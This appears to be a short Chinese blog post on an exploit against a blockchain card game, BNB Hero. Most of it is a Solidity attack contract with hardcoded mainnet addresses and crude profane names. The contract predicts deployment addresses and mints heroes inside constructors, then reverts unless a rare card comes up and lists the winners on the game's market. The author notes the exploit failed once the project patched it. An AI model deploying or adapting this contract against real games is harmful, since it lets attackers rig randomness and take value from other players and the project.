一个很简单的游戏，随机抽卡 + 一个按钮打架的简单模式
首先说一下已经修复了，为什么我的变量名会写出这样 因为我喜欢
利用合约

// SPDX-License-Identifier: GPL-3.0

pragma solidity >=0.7.0 <0.9.0;
import './Ownable.sol';
import './IERC20.sol';

interface IBNBHero{
  function createNewHero() external;
}
interface IBNBHCharacter{
    function getRarity(uint256 _heroId) external view returns (uint256);
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256 tokenId);
    function approve(address to, uint256 tokenId) external;
    function setApprovalForAll(address operator, bool _approved) external;
    function safeTransferFrom(address from,address to,uint256 tokenId) external ;
}
interface IBNBHMarket{
  function addListing(uint256 _id,uint256 _price) external;
}

interface IFUCK{
    function ClaimTokenAndJerkOffFuckBitch1337() external;
}
contract LetSGO{
    address public Owner = 0xec759d5fe395ffD698A0383A6A5CF1CAE8DEFA3d;
    constructor(){
        IERC20(0xD25631648E3Ad4863332319E8E0d6f2A8EC6f267).approve(0xde9fFb228C1789FEf3F08014498F2b16c57db855,150000000000000000000);
        IFUCK(msg.sender).ClaimTokenAndJerkOffFuckBitch1337();
        address BNBC = 0x6DA72F24c56197Dcf6B8920baCb183F6ccca8b01;
        address BNBH = 0xde9fFb228C1789FEf3F08014498F2b16c57db855;
        IBNBHero(BNBH).createNewHero();
        uint256 HeroId = IBNBHCharacter(BNBC).tokenOfOwnerByIndex(address(this),0);
        uint256 heroRA = IBNBHCharacter(BNBC).getRarity(HeroId);
        require(heroRA >= 4,"HAHHHAH");
        IBNBHCharacter(BNBC).setApprovalForAll(0x5CFFca0321b83dc873Bd2439aE7fEA10aE163fac,true);
        IBNBHMarket(0x5CFFca0321b83dc873Bd2439aE7fEA10aE163fac).addListing(HeroId,300);
    }
    function emmergencyWithdraw13377(address _token, uint _amount) external returns(bool success){
        require(Owner == msg.sender);
        require(IERC20(_token).balanceOf(address(this)) >= _amount, "not enough tokens in contract");
        IERC20(_token).transfer(msg.sender, _amount);
        return true;
    }
}

contract PUSSY is Ownable {
    function addressFrom(address _origin, uint256 _nonce) internal pure returns (address _address) {
        bytes memory data;
        if(_nonce == 0x00)          data = abi.encodePacked(bytes1(0xd6), bytes1(0x94), _origin, bytes1(0x80));
        else if(_nonce <= 0x7f)     data = abi.encodePacked(bytes1(0xd6), bytes1(0x94), _origin, uint8(_nonce));
        else if(_nonce <= 0xff)     data = abi.encodePacked(bytes1(0xd7), bytes1(0x94), _origin, bytes1(0x81), uint8(_nonce));
        else if(_nonce <= 0xffff)   data = abi.encodePacked(bytes1(0xd8), bytes1(0x94), _origin, bytes1(0x82), uint16(_nonce));
        else if(_nonce <= 0xffffff) data = abi.encodePacked(bytes1(0xd9), bytes1(0x94), _origin, bytes1(0x83), uint24(_nonce));
        else                        data = abi.encodePacked(bytes1(0xda), bytes1(0x94), _origin, bytes1(0x84), uint32(_nonce));
    bytes32 hash = keccak256(data);
    assembly {
        mstore(0, hash)
        _address := mload(0)
    }
}
    mapping(address => bool) public shuaige;
    constructor(){
        shuaige[msg.sender] = true;
    }
    uint256 public nonce = 1;
   function createNewHero() external onlyOwner{
       address contractAddress = addressFrom(address(this),nonce);
       shuaige[contractAddress] = true;
       new LetSGO();
       nonce += 1;
   }
   function ClaimTokenAndJerkOffFuckBitch1337() external{
       require(shuaige[msg.sender] == true);
       IERC20(0xD25631648E3Ad4863332319E8E0d6f2A8EC6f267).transfer(msg.sender,43000000000000000000);
   }
    function emmergencyWithdraw13377(address _token, uint _amount) external onlyOwner returns(bool success){
        require(IERC20(_token).balanceOf(address(this)) >= _amount, "not enough tokens in contract");
        IERC20(_token).transfer(msg.sender, _amount);
        return true;
    }
}

首先利用是失败的，因为项目方发现了漏洞，所以我放弃了这次利用。整个合约很简单，就是交易回滚，开到史诗以上的卡就提交到市场。